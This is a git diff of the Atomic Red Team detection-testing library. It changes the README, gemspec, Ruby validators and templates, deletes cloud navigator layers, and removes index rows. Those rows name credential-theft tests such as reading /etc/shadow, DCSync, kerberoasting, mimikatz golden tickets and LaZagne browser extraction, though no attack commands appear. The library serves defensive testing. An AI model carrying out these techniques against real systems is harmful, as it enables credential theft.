rb-fsevent (~> 0.9, >= 0.9.4)
rb-inotify (~> 0.9, >= 0.9.7)
sawyer (0.8.2)
addressable (>= 2.3.5)
faraday (> 0.8, < 2.0)
terminal-table (1.8.0)
unicode-display_width (~> 1.1, >= 1.1.1)
thread_safe (0.3.6)
typhoeus (1.3.1)
ethon (>= 0.9.0)
tzinfo (1.2.5)
thread_safe (~> 0.1)
unicode-display_width (1.6.0)
PLATFORMS
ruby
DEPENDENCIES
atomic-red-team!
github-pages
BUNDLED WITH
1.17.3
README.md
+45 -25
View File
@@ -1,39 +1,59 @@
<p><img src="https://redcanary.com/wp-content/uploads/Atomic-Red-Team-Logo.png" width="150px" /></p>
# Atomic Red Team
[![CircleCI](https://circleci.com/gh/redcanaryco/atomic-red-team.svg?style=svg)](https://circleci.com/gh/redcanaryco/atomic-red-team)
![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master)
Atomic Red Team allows every security team to test their controls by executing simple
"atomic tests" that exercise the same techniques used by adversaries (all mapped to
[Mitre's ATT&CK](https://attack.mitre.org)).
Atomic Red Team™ is a library of tests mapped to the
[MITRE ATT&CK®](https://attack.mitre.org/) framework. Security teams can use
Atomic Red Team to quickly, portably, and reproducibly test their environments.
## Philosophy
## Get started
Atomic Red Team is a library of simple tests that every security team can execute to test their controls. Tests are
focused, have few dependencies, and are defined in a structured format that can be used by automation frameworks.
You can execute atomic tests directly from the command line, no installation
required. See the [Getting started](https://github.com/redcanaryco/atomic-red-team/wiki/Getting-Started)
page of our wiki.
Three key beliefs made up the Atomic Red Team charter:
- **Teams need to be able to test everything from specific technical controls to outcomes.**
Our security teams do not want to operate with a “hopes and prayers” attitude toward detection. We need to know
what our controls and program can detect, and what it cannot. We dont have to detect every adversary, but we
do believe in knowing our blind spots.
For a more robust testing experience, consider using an execution framework like
[Invoke-Atomic](https://github.com/redcanaryco/invoke-atomicredteam).
- **We should be able to run a test in less than five minutes.**
Most security tests and automation tools take a tremendous amount of time to install, configure, and execute.
We coined the term "atomic tests" because we felt there was a simple way to decompose tests so most could be
run in a few minutes.
## Learn more
The best test is the one you actually run.
The Atomic Red Team documentation is available as a [wiki](https://github.com/redcanaryco/atomic-red-team/wiki/).
- **We need to keep learning how adversaries are operating.**
Most security teams dont have the benefit of seeing a wide variety of adversary types and techniques crossing
their desk every day. Even we at Red Canary only come across a fraction of the possible techniques being used,
which makes the community working together essential to making us all better.
For information about the philosophy and development of Atomic Red Team, visit
our website at <https://atomicredteam.io>.
See: https://atomicredteam.io
## Contribute to Atomic Red Team
## Having trouble?
Atomic Red Team is open source and community developed. If you're interested in
becoming a contributor, check out these resources:
Join the community on Slack at [https://atomicredteam.slack.com](https://atomicredteam.slack.com)
- Join our [Slack workspace](https://slack.atomicredteam.io) and get involved
with the community. Don't forget to review the [code of conduct](CODE_OF_CONDUCT.md)
before you join.
- Report bugs and request new features by [submitting an issue](https://github.com/redcanaryco/atomic-red-team/issues/new/choose).
- Read our [contribution guide](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
for more information about contributing directly to this repository.
- Check the [license](LICENSE.txt) for information regarding the distribution
and modification of Atomic Red Team.
## Getting Started
* [Getting Started With Atomic Red Team](https://github.com/redcanaryco/atomic-red-team/wiki/About-Atomic-Red-Team)
* Automated Test Execution with the [Execution Frameworks](https://github.com/redcanaryco/atomic-red-team/blob/master/execution-frameworks)
* Peruse the Complete list of Atomic Tests ([md](atomics/Indexes/Indexes-Markdown/index.md), [csv](atomics/Indexes/Indexes-CSV/index.csv)) and the [ATT&CK Matrix](atomics/Indexes/Matrices/matrix.md)
- Windows [Matrix](atomics/Indexes/Matrices/windows-matrix.md) and tests by tactic ([md](atomics/Indexes/Indexes-Markdown/windows-index.md), [csv](atomics/Indexes/Indexes-CSV/windows-index.csv))
- MacOS [Matrix](atomics/Indexes/Matrices/macos-matrix.md) and tests by tactic ([md](atomics/Indexes/Indexes-Markdown/macos-index.md), [csv](atomics/Indexes/Indexes-CSV/macos-index.csv))
- Linux [Matrix](atomics/Indexes/Matrices/linux-matrix.md) and tests by tactic ([md](atomics/Indexes/Indexes-Markdown/linux-index.md), [csv](atomics/Indexes/Indexes-CSV/linux-index.csv))
* Using [ATT&CK Navigator](https://github.com/mitre-attack/attack-navigator)? Check out our coverage layers ([All](atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json), [Windows](atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json), [MacOS](atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json), [Linux](atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json))
* [Fork](https://github.com/redcanaryco/atomic-red-team/fork) and [Contribute](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) your own modifications
* Have questions? Join the community on Slack at [https://atomicredteam.slack.com](https://atomicredteam.slack.com)
* Need a Slack invitation? Grab one at [https://slack.atomicredteam.io/](https://slack.atomicredteam.io/)
## Code of Conduct
In order to have a more open and welcoming community, Atomic Red Team adheres to a
[code of conduct](CODE_OF_CONDUCT.md).
## License
See the [LICENSE](https://github.com/redcanaryco/atomic-red-team/blob/master/LICENSE.txt) file.
atomic-red-team.gemspec
+2 -2
View File
@@ -3,7 +3,7 @@ Gem::Specification.new do |s|
s.name = 'atomic-red-team'
s.version = '1.0'
s.authors = ['Red Canary', 'Casey Smith', 'Mike Haag']
s.email = ['it@redcanary.com', 'opensource@redcanary.com']
s.email = ['it@redcanary.com', 'casey.smith@redcanary.com', 'mike.haag@redcanary.com']
s.summary = 'Small, highly portable, community developed detection tests mapped to ATT&CK.'
s.license = "MIT"
s.homepage = "https://redcanary.com/atomic-red-team"
@@ -12,4 +12,4 @@ Gem::Specification.new do |s|
s.require_paths = %w(atomic_red_team)
s.add_development_dependency 'github-pages'
end
end
atomic_red_team/atomic_doc_template.md.erb
+2 -6
View File
@@ -25,17 +25,13 @@
end
end.join(', ') %>
**auto_generated_guid:** <%= test['auto_generated_guid'] %>
<%def cleanup(input)
input.to_s.strip.gsub(/\\/,"&#92;")
end%>
<% if test['input_arguments'].to_a.count > 0 %>
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
<% test['input_arguments'].each do |arg_name, arg_options| -%>
| <%= cleanup(arg_name) %> | <%= cleanup(arg_options['description']) %> | <%= cleanup(arg_options['type']) %> | <%= cleanup(arg_options['default']) %>|
@@ -79,7 +75,7 @@ end%>
##### Description: <%= dep['description'].strip %>
##### Check Prereq Commands:
```<%= get_language(dependency_executor) %>
<%= dep['prereq_command'].strip %>
<%= dep['prereq_command'].strip %>
```
##### Get Prereq Commands:
```<%= get_language(dependency_executor) %>
atomic_red_team/atomic_red_team.rb
+4 -4
View File
@@ -60,7 +60,7 @@ class AtomicRedTeam
"[#{link_display}](../../#{technique_identifier}/#{technique_identifier}.md)"
else
# we don't have a file for this technique, or there are not tests for the given platform, so link to an edit page
"#{link_display} [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)"
"#{link_display} [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)"
end
end
@@ -108,7 +108,7 @@ class AtomicRedTeam
raise("`atomic_tests[#{i}].supported_platforms` element is required") unless atomic.has_key?('supported_platforms')
raise("`atomic_tests[#{i}].supported_platforms` element must be an Array (was a #{atomic['supported_platforms'].class.name})") unless atomic['supported_platforms'].is_a?(Array)
valid_supported_platforms = ['windows', 'macos', 'linux', 'office-365', 'azure-ad', 'google-workspace', 'saas', 'iaas', 'containers', 'iaas:aws', 'iaas:azure', 'iaas:gcp']
valid_supported_platforms = ['windows', 'macos', 'linux']
atomic['supported_platforms'].each do |platform|
if !valid_supported_platforms.include?(platform)
raise("`atomic_tests[#{i}].supported_platforms` '#{platform}' must be one of #{valid_supported_platforms.join(', ')}")
@@ -142,7 +142,7 @@ class AtomicRedTeam
raise("`atomic_tests[#{i}].executor.name` element must be a string") unless executor['name'].is_a?(String)
raise("`atomic_tests[#{i}].executor.name` element must be lowercased and underscored (was #{executor['name']})") unless executor['name'] =~ /[a-z_]+/
valid_executor_types = ['command_prompt', 'sh', 'bash', 'powershell', 'manual', 'aws', 'az', 'gcloud', 'kubectl']
valid_executor_types = ['command_prompt', 'sh', 'bash', 'powershell', 'manual']
case executor['name']
when 'manual'
raise("`atomic_tests[#{i}].executor.steps` element is required") unless executor.has_key?('steps')
@@ -152,7 +152,7 @@ class AtomicRedTeam
string: executor['steps'],
string_description: "atomic_tests[#{i}].executor.steps"
when 'command_prompt', 'sh', 'bash', 'powershell', 'aws', 'az', 'gcloud', 'kubectl'
when 'command_prompt', 'sh', 'bash', 'powershell'
raise("`atomic_tests[#{i}].executor.command` element is required") unless executor.has_key?('command')
raise("`atomic_tests[#{i}].executor.command` element must be a string") unless executor['command'].is_a?(String)
atomic_red_team/atomic_test_template.yaml
+8 -8
View File
@@ -15,22 +15,22 @@ atomic_tests:
input_arguments:
output_file:
description: TODO
type: TODO
type: todo
default: TODO
dependency_executor_name: powershell # (optional) The executor for the prereq commands, defaults to the same executor used by the attack commands.
dependency_executor_name: powershell # (optional) The executor for the prereq commands, defaults to the same executor used by the attack commands
dependencies: # (optional)
- description: |
TODO
prereq_command: | # Commands to check if prerequisites for running this test are met. For the "command_prompt" executor, if any command returns a non-zero exit code, the prerequisites are not met. For the "powershell" executor, all commands are run as a script block and the script block must return 0 for success.
prereq_command: | # commands to check if prerequisites for running this test are met. For the "command_prompt" executor, if any command returns a non-zero exit code, the pre-requisites are not met. For the "powershell" executor, all commands are run as a script block and the script block must return 0 for success.
TODO
get_prereq_command: | # Commands to meet this prerequisite or a message describing how to meet this prerequisite.
get_prereq_command: | # commands to meet this prerequisite or a message describing how to meet this prereq
TODO
executor:
name: command_prompt
elevation_required: true # Indicates whether command must be run with admin privileges. If the elevation_required attribute is not defined, the value is assumed to be false.
command: | # These are the actaul attack commands, at least one command must be provided.
TODO
cleanup_command: | # You can remove the cleanup_command section if there are no cleanup commands.
elevation_required: true # indicates whether command must be run with admin privileges. If the elevation_required attribute is not defined, the value is assumed to be false
command: | # these are the actaul attack commands, at least one command must be provided
TODO
cleanup_command: | # you can remove the cleanup_command section if there are no cleanup commands
TODO
atomic_red_team/attack_api.rb
+3 -5
View File
@@ -75,9 +75,9 @@ class Attack
techniques_by_tactic = Hash.new {|h, k| h[k] = []}
techniques.each do |technique|
next unless !technique['x_mitre_platforms'].nil?
next unless technique['x_mitre_platforms'].any? { |platform| platform.downcase =~ only_platform }
next unless technique['x_mitre_platforms'].any? {|platform| platform.downcase =~ only_platform}
technique.fetch('kill_chain_phases', []).select { |phase| phase['kill_chain_name'] == 'mitre-attack' }.each do |tactic|
technique.fetch('kill_chain_phases', []).select {|phase| phase['kill_chain_name'] == 'mitre-attack'}.each do |tactic|
techniques_by_tactic[tactic.fetch('phase_name')] << technique
end
end
@@ -88,10 +88,8 @@ class Attack
# Returns a list of all ATT&CK techniques
#
def techniques
return @techniques unless @techniques.nil?
# pull out the attack pattern objects
@techniques = attack_stix.fetch("objects").select do |item|
attack_stix.fetch("objects").select do |item|
item.fetch('type') == 'attack-pattern' && item.fetch('external_references', []).select do |references|
references['source_name'] == 'mitre-attack'
end
atomic_red_team/enterprise-attack.json
+224185 -356396
View File
File diff suppressed because it is too large Load Diff
atomic_red_team/spec.yaml
+39 -20
View File
@@ -51,15 +51,6 @@ atomic_tests:
# - windows
# - macos
# - linux
# - office-365
# - azure-ad
# - google-workspace
# - saas
# - iaas
# - containers
# - iaas:gcp
# - iaas:azure
# - iaas:aws
supported_platforms:
- windows
@@ -115,20 +106,48 @@ atomic_tests:
# a list of executors that can execute the attack commands of this atomic test. There are almost always going to be one of these
# per test, but there are cases where you may have multiple - for example, separate executors for `sh`
# and `bash` when working on linux OSes.
# Names of cloud/container specific runtimes can also be used, such as `aws`, `az`, `gcloud` and `kubectl`.
executor:
executors:
# the name of the executor describes the framework or application in which the test should be executed.
#
# Each of these executors will have options that the executor needs to run. Possible executors we've imagined
# at this time and their required options include:
#
# - command_prompt, sh, bash, powershell, manual, aws, az, gcloud, kubectl
#
# Each of the above requires the "command" option that is a multi-line script that will be preprocessed and
# then executed by cmd.exe, powershell.exe, sh or bash respectively
# - `command_prompt` : The Windows Command Prompt, aka cmd.exe
# Requires the "command" option that is a multi-line script that will be preprocessed and
# then executed by cmd.exe
#
# Example:
# name: command_prompt
# - name: command_prompt
# command: |
# echo "attack starting"
# echo "running command 1: this is the value of the FOOBAR input_argument: #{FOOBAR}"
#
# - `powershell` : Powershell
# Requires the "`command`" option that is a multi-line script that will be preprocessed and
# then executed by cmd.exe
#
# Example:
# - name: powershell
# command: |
# Write-Debug "attack starting"
# Write-Debug "running command 1: this is the value of the FOOBAR input_argument: #{FOOBAR}"
#
# - `sh` : Linux's bourne shell
# Requires the "`command`" option that is a multi-line script that will be preprocessed and
# then executed by cmd.exe
#
# Example:
# - name: sh
# command: |
# echo "attack starting"
# echo "running command 1: this is the value of the FOOBAR input_argument: #{FOOBAR}"
#
# - `bash` : Linux's bourne again shell
# Requires the "`command`" option that is a multi-line script that will be preprocessed and
# then executed by cmd.exe
#
# Example:
# - name: bash
# command: |
# echo "attack starting"
# echo "running command 1: this is the value of the FOOBAR input_argument: #{FOOBAR}"
@@ -140,7 +159,7 @@ atomic_tests:
# multi-line list of instructions (also preprocessed)
#
# Example:
# name: manual
# - name: manual
# steps: |
# 1. Navigate to [chrome://extensions](chrome://extensions) and
# tick 'Developer Mode'.
@@ -150,7 +169,7 @@ atomic_tests:
#
# 3. Click the '#{FOOBAR}' button - you can interpolate here too!
#
name: command_prompt
- name: command_prompt
elevation_required: true
# indicates whether command must be run with admin privileges.
#If the elevation_required attribute is not defined, the value is assumed to be false
@@ -171,6 +190,6 @@ atomic_tests:
# in this example we have no input arguments
input_arguments:
executor:
name: bash
executors:
- name: bash
command: echo "Hello world!"
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json
-1
View File
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Azure-AD)","versions":{"attack":"10","navigator":"4.5.5","layer":"4.3"},"description":"Atomic Red Team (Azure-AD) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1098.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1110.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1484.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1484","score":100,"enabled":true},{"techniqueID":"T1606.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1606","score":100,"enabled":true}]}
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-containers.json
-1
View File
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Containers)","versions":{"attack":"10","navigator":"4.5.5","layer":"4.3"},"description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1053.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1609","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1611","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1611","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]}]}
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-google-workspace.json
-1
View File
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Google-Workspace)","versions":{"attack":"10","navigator":"4.5.5","layer":"4.3"},"description":"Atomic Red Team (Google-Workspace) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1078.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1078","score":100,"enabled":true}]}
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-aws.json
-1
View File
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Iaas:AWS)","versions":{"attack":"10","navigator":"4.5.5","layer":"4.3"},"description":"Atomic Red Team (Iaas:AWS) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[]}
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-azure.json
-1
View File
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Iaas:Azure)","versions":{"attack":"10","navigator":"4.5.5","layer":"4.3"},"description":"Atomic Red Team (Iaas:Azure) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1562.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1562","score":100,"enabled":true}]}
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-gcp.json
-1
View File
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Iaas:GCP)","versions":{"attack":"10","navigator":"4.5.5","layer":"4.3"},"description":"Atomic Red Team (Iaas:GCP) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[]}
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json
-1
View File
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Iaas)","versions":{"attack":"10","navigator":"4.5.5","layer":"4.3"},"description":"Atomic Red Team (Iaas) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1098.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1136.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1562.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1562","score":100,"enabled":true}]}
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
+1 -1
View File
File diff suppressed because one or more lines are too long
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json
+1 -1
View File
File diff suppressed because one or more lines are too long
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json
-1
View File
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Office-365)","versions":{"attack":"10","navigator":"4.5.5","layer":"4.3"},"description":"Atomic Red Team (Office-365) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1562.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]}]}
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
+1 -1
View File
File diff suppressed because one or more lines are too long
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
+1 -1
View File
File diff suppressed because one or more lines are too long
atomics/Indexes/Indexes-CSV/index.csv
+222 -674
View File
@@ -1,169 +1,7 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
credential-access,T1003.008,/etc/passwd and /etc/shadow,1,Access /etc/shadow (Local),3723ab77-c546-403c-8fb4-bb577033b235,bash
credential-access,T1003.008,/etc/passwd and /etc/shadow,2,Access /etc/passwd (Local),60e860b6-8ae6-49db-ad07-5e73edd88f5d,sh
credential-access,T1003.008,/etc/passwd and /etc/shadow,3,"Access /etc/{shadow,passwd} with a standard bin that's not cat",df1a55ae-019d-4120-bc35-94f4bc5c4b0a,bash
credential-access,T1003.008,/etc/passwd and /etc/shadow,4,"Access /etc/{shadow,passwd} with shell builtins",f5aa6543-6cb2-4fae-b9c2-b96e14721713,bash
credential-access,T1558.004,AS-REP Roasting,1,Rubeus asreproast,615bd568-2859-41b5-9aed-61f6a88e48dd,powershell
credential-access,T1558.004,AS-REP Roasting,2,Get-DomainUser with PowerView,d6139549-7b72-4e48-9ea1-324fc9bdf88a,powershell
credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
credential-access,T1003.005,Cached Domain Credentials,1,Cached Credential Dump via Cmdkey,56506854-89d6-46a3-9804-b7fde90791f9,command_prompt
credential-access,T1552.007,Container API,1,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash
credential-access,T1552.007,Container API,2,Cat the contents of a Kubernetes service account token file,788e0019-a483-45da-bcfe-96353d46820f,sh
credential-access,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
credential-access,T1110.004,Credential Stuffing,1,SSH Credential Stuffing From Linux,4f08197a-2a8a-472d-9589-cd2895ef22ad,bash
credential-access,T1110.004,Credential Stuffing,2,SSH Credential Stuffing From MacOS,d546a3d9-0be5-40c7-ad82-5a7d79e1b66b,bash
credential-access,T1552.001,Credentials In Files,1,Extract Browser and System credentials with LaZagne,9e507bb8-1d30-4e3b-a49b-cb5727d7ea79,bash
credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
credential-access,T1552.001,Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
credential-access,T1552.001,Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
credential-access,T1552.001,Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
credential-access,T1555,Credentials from Password Stores,1,Extract Windows Credential Manager via VBA,234f9b7c-b53d-4f32-897b-b880a6c9ea7b,powershell
credential-access,T1555,Credentials from Password Stores,2,Dump credentials from Windows Credential Manager With PowerShell [windows Credentials],c89becbe-1758-4e7d-a0f4-97d2188a23e3,powershell
credential-access,T1555,Credentials from Password Stores,3,Dump credentials from Windows Credential Manager With PowerShell [web Credentials],8fd5a296-6772-4766-9991-ff4e92af7240,powershell
credential-access,T1555,Credentials from Password Stores,4,Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials],36753ded-e5c4-4eb5-bc3c-e8fba236878d,powershell
credential-access,T1555,Credentials from Password Stores,5,Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials],bc071188-459f-44d5-901a-f8f2625b2d2e,powershell
credential-access,T1555.003,Credentials from Web Browsers,1,Run Chrome-password Collector,8c05b133-d438-47ca-a630-19cc464c4622,powershell
credential-access,T1555.003,Credentials from Web Browsers,2,Search macOS Safari Cookies,c1402f7b-67ca-43a8-b5f3-3143abedc01b,sh
credential-access,T1555.003,Credentials from Web Browsers,3,LaZagne - Credentials from Browser,9a2915b3-3954-4cce-8c76-00fbf4dbd014,command_prompt
credential-access,T1555.003,Credentials from Web Browsers,4,Simulating access to Chrome Login Data,3d111226-d09a-4911-8715-fe11664f960d,powershell
credential-access,T1555.003,Credentials from Web Browsers,5,Simulating access to Opera Login Data,28498c17-57e4-495a-b0be-cc1e36de408b,powershell
credential-access,T1555.003,Credentials from Web Browsers,6,Simulating access to Windows Firefox Login Data,eb8da98a-2e16-4551-b3dd-83de49baa14c,powershell
credential-access,T1555.003,Credentials from Web Browsers,7,Simulating access to Windows Edge Login Data,a6a5ec26-a2d1-4109-9d35-58b867689329,powershell
credential-access,T1555.003,Credentials from Web Browsers,8,Decrypt Mozilla Passwords with Firepwd.py,dc9cd677-c70f-4df5-bd1c-f114af3c2381,powershell
credential-access,T1552.002,Credentials in Registry,1,Enumeration for Credentials in Registry,b6ec082c-7384-46b3-a111-9a9b8b14e5e7,command_prompt
credential-access,T1552.002,Credentials in Registry,2,Enumeration for PuTTY Credentials in Registry,af197fd7-e868-448e-9bd5-05d1bcd9d9e5,command_prompt
credential-access,T1003.006,DCSync,1,DCSync (Active Directory),129efd28-8497-4c87-a1b0-73b9a870ca3e,command_prompt
credential-access,T1003.006,DCSync,2,Run DSInternals Get-ADReplAccount,a0bced08-3fc5-4d8b-93b7-e8344739376e,powershell
credential-access,T1187,Forced Authentication,1,PetitPotam,485ce873-2e65-4706-9c7e-ae3ab9e14213,powershell
credential-access,T1056.002,GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
credential-access,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
credential-access,T1558.001,Golden Ticket,1,Crafting Active Directory golden tickets with mimikatz,9726592a-dabc-4d4d-81cd-44070008b3af,powershell
credential-access,T1558.001,Golden Ticket,2,Crafting Active Directory golden tickets with Rubeus,e42d33cd-205c-4acf-ab59-a9f38f6bad9c,powershell
credential-access,T1552.006,Group Policy Preferences,1,GPP Passwords (findstr),870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f,command_prompt
credential-access,T1552.006,Group Policy Preferences,2,GPP Passwords (Get-GPPPassword),e9584f82-322c-474a-b831-940fd8b4455c,powershell
credential-access,T1558.003,Kerberoasting,1,Request for service tickets,3f987809-3681-43c8-bcd8-b3ff3a28533a,powershell
credential-access,T1558.003,Kerberoasting,2,Rubeus kerberoast,14625569-6def-4497-99ac-8e7817105b55,powershell
credential-access,T1558.003,Kerberoasting,3,Extract all accounts in use as SPN using setspn,e6f4affd-d826-4871-9a62-6c9004b8fe06,command_prompt
credential-access,T1558.003,Kerberoasting,4,Request A Single Ticket via PowerShell,988539bc-2ed7-4e62-aec6-7c5cf6680863,powershell
